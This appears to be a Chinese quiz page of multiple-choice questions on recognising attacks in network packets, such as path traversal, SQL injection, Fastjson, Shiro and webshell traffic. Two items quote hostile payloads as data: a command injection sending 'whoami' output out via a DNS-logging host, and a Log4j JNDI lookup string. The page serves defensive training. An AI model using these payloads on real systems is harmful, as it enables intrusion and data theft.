單項選擇題攻擊數據包中出現多個"../"字樣,則最有可能是攻擊者進行哪項漏洞攻擊()
A.xss漏洞攻擊
B.xml注入漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.任意文件讀取
您可能感興趣的試卷
你可能感興趣的試題
1.單項選擇題網絡攻擊數據包中,存在"Acunetix"字樣,可以判斷出此款漏掃掃描器為()
A.AppScan
B.Awvs
C.xray
D.burp
2.單項選擇題網絡數據包中出現ping `whoami`.aaa.dnslog.com,攻擊者最有可能的目的是哪項()
A.xss漏洞攻擊
B.單純執(zhí)行ping命令
C.把whoami命令執(zhí)行結果,通過dns域名顯示出來
D.SQL注入漏洞攻擊
3.單項選擇題網絡數據包中出現新增jsp、php、aspx腳本語言文件的加密流量,說明攻擊者有可能正在進行哪項操作()
A.正常請求訪問
B.連接webshell進行服務器操作
C.漏洞掃描
4.單項選擇題網絡數據包中出現wget、curl等字眼時,說明攻擊者最有可能采取以下哪種漏洞攻擊()
A.xss漏洞攻擊
B.xml注入漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.SQL注入漏洞攻擊
5.單項選擇題在攻擊數據包中,出現select、database()、user()、version()等字眼,可能是以下哪種攻擊()
A.xss漏洞攻擊
B.ssrf漏洞攻擊
C.文件上傳漏洞攻擊
D.SQL注入漏洞攻擊
6.單項選擇題在攻擊數據包中,出現@type的字眼,可能是以下哪種攻擊()
A.ssrf漏洞攻擊
B.Log4j漏洞攻擊
C.csrf漏洞攻擊
D.Fastjson漏洞攻擊
7.單項選擇題數據包Cookie中帶有rememberMe字樣,說明此系統最有可能使用了什么框架組件()
A.Fastjson
B.Log4j
C.Spring
D.Shiro
8.單項選擇題通過以下哪個平臺,可以在不對攻擊IP進行端口掃描的前提下,初步獲取到該IP的端資產信息()
A.virustotal
B.fofa
C.DNSlog平臺
9.單項選擇題以下哪種方式可以加快溯源到攻擊者的社交軟件ID()
A.部署WAF
B.部署IPS
C.部署蜜罐
D.部署防火墻
10.單項選擇題在攻擊數據包中,出現${jndi:ldap://111.xxx.io}的字眼,可能是以下哪種攻擊()
A.ssrf漏洞攻擊
B.Log4j漏洞攻擊
C.csrf漏洞攻擊
D.SQL注入漏洞攻擊
最新試題
下列哪種安全評估類型定期檢查系統的安全性并提出建議()
題型:單項選擇題
魚叉式網絡釣魚主要有哪幾種類型()
題型:多項選擇題
提高員工安全意識的方法包括()
題型:多項選擇題
防御惡意軟件的策略包括以下哪些()
題型:多項選擇題
信息系統等級保護實施過程有()
題型:多項選擇題
信息存儲技術按其存儲原理分類有()
題型:多項選擇題
有效的網絡安全政策應包括()
題型:多項選擇題
網絡與信息安全漏洞和隱患發(fā)現人員在開展網絡與信息安全漏洞和隱患發(fā)現相關工作時,禁止破壞被測系統及相關數據完整性,可能會破壞被測系統及相關數據完整性的高危操作包括()
題型:多項選擇題
下列哪種備份類型備份所有更改的文件并標記為已備份()
題型:單項選擇題
企業(yè)網絡安全政策的制定應考慮以下哪些因素()
題型:多項選擇題